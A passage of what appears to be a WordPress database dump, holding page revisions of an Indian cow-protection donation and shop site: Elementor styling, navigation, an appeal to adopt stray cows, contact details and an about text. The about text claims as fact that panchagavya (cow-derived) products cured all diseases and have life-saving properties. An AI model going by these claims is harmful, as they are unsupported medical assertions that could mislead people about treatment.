href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-20 17:41:39','2022-10-20 12:11:39','',1816,'https://gopalak.in/?p=1948',0,'revision','',0),(1949,1,'2022-10-20 17:41:39','2022-10-20 12:11:39','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-20 17:41:39','2022-10-20 12:11:39','',1816,'https://gopalak.in/?p=1949',0,'revision','',0),(1950,1,'2022-10-20 17:41:40','2022-10-20 12:11:40','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-20 17:41:40','2022-10-20 12:11:40','',1816,'https://gopalak.in/?p=1950',0,'revision','',0),(1952,1,'2022-10-20 17:49:34','2022-10-20 12:19:34','.site-content {background-color: #96ff00;}\n.site-inner {\n	background-color: #FFFE71;\n}\n#page {\n	background-color: #D5EBC1;\n}\n#site-header {	\n	background:#c7f6b6;\n}\nheader {\n    background: #fff;\n}\n\n.below-header-bar {\n    height: 62px;\n}\n\n.top-header {\n    border-bottom: solid;\n    border-bottom-width: 0px;\n}\n\n.top-header, .main-header, .below-header {\n    position: relative;\n}\n\n.top-header:before {\n    content: \"\";\n    position: absolute;\n    top: 0;\n    left: 0;\n    width: 100%;\n    height: 100%;\n    background: #c7f6b6;\n}\n\n.top-header .top-header-bar {\n    line-height: 45px;\n}\n\n/*below header special css*/\n.below-header-col1 {\n    float: left;\n    width: 21%;\n}\n\n.below-header-col3 {\n    float: left;\n    width: 22%;\n}\n\n.below-header-col2 {\n    width: 57%;\n    float: left;\n    text-align: center;\n}\n\n.main-header:before, .below-header:before {\n    content: \"\";\n    position: absolute;\n    top: 0;\n    left: 0;\n    width: 100%;\n    height: 100%;\n    background: #43693F;\n}\n.top-footer:before, .below-footer:before, .widget-footer:before {\n    content: \"\";\n    position: absolute;\n    top: 0;\n    left: 0;\n    width: 100%;\n    height: 100%;\n    background: #43693F;\n} #D5EBC1;\n}\n//#96ff00\n//#FFDF00','open-shop','','inherit','closed','closed','','1172-revision-v1','','','2022-10-20 17:49:34','2022-10-20 12:19:34','',1172,'https://gopalak.in/?p=1952',0,'revision','',0),(1957,1,'2022-10-20 17:59:45','2022-10-20 12:29:45','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, 